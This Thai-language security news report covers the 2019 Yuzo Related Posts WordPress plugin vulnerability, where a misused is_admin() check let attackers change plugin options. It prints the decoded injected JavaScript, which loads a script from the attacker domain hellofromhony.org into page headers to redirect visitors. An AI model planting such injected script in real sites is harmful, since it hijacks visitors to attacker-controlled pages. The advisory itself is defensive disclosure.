เมื่อวันที่ 30 มีนาคม 2019 ผู้พัฒนาปลั๊กอิน Yuzo Related Posts ได้ลบปลั๊กอินนี้ออกจากรายการปลั๊กอินบน WordPress แล้ว เนื่องจากบริษัทรักษาความปลอดภัยของ WordPress ได้ออกมาเปิดเผยช่องโหว่ของปลั๊กอินนี้
Dan Moen นักวิจัยจาก Defiant ได้อธิบายว่า ช่องโหว่นี้เกิดจากไม่มีการตรวจสอบความถูกต้อง ทำให้แฮกเกอร์สามารถแก้ไขค่า yuzo_related_post_options เพื่อฉีดสคริปต์ที่เป็นอันตราย โดยใช้ช่องโหว่ฟังก์ชัน is_admin() ซึ่งฟังก์ชันนี้จะทำการตรวจสอบว่าผู้ใช้นั้นได้อยู่ในส่วนของผู้ดูแลระบบ แทนที่จะตรวจสอบว่าผู้ใช้นั้นเป็นผู้ดูแลระบบ
49, 49,
แฮกเกอร์จะใช้ประโยชน์จากช่องโหว่นี้เปลี่ยนเส้นทางของเว็บไซต์ไปยังเว็บที่แฮกเกอร์สร้างไว้ เมื่อถอดรหัสจากภาพด้านบนจะพบว่ามีการฉีดสคริปต์ https://hellofromhony[.]org/counter เข้าไปยังส่วนหัวของหน้าเพจ ดังภาพ
var dd = 'script';
var elem = document.createElement (dd);
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://hellofromhony.org/counter';
document.getElementsByTagName('head')[0].appendChild (elem);
สำหรับรายละเอียดเกี่ยวกับช่องโหว่นี้สามารถดูได้ที่ https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
ในตอนนี้มีผู้ใช้ที่ติดตั้งปลั๊กอินนี้ไปแล้วมากกว่า 60,000 ราย ซึ่งไม่ได้รับการแจ้งเตือนเกี่ยวกับช่องโหว่นี้เลย
สำหรับวิธีการป้องกันแนะนำให้ทำการลบปลั๊กอินนี้ออกไปก่อนจนกว่าผู้พัฒนาจะออกเวอร์ชั่นใหม่ออกมา
ที่มา: Bleeping Computer
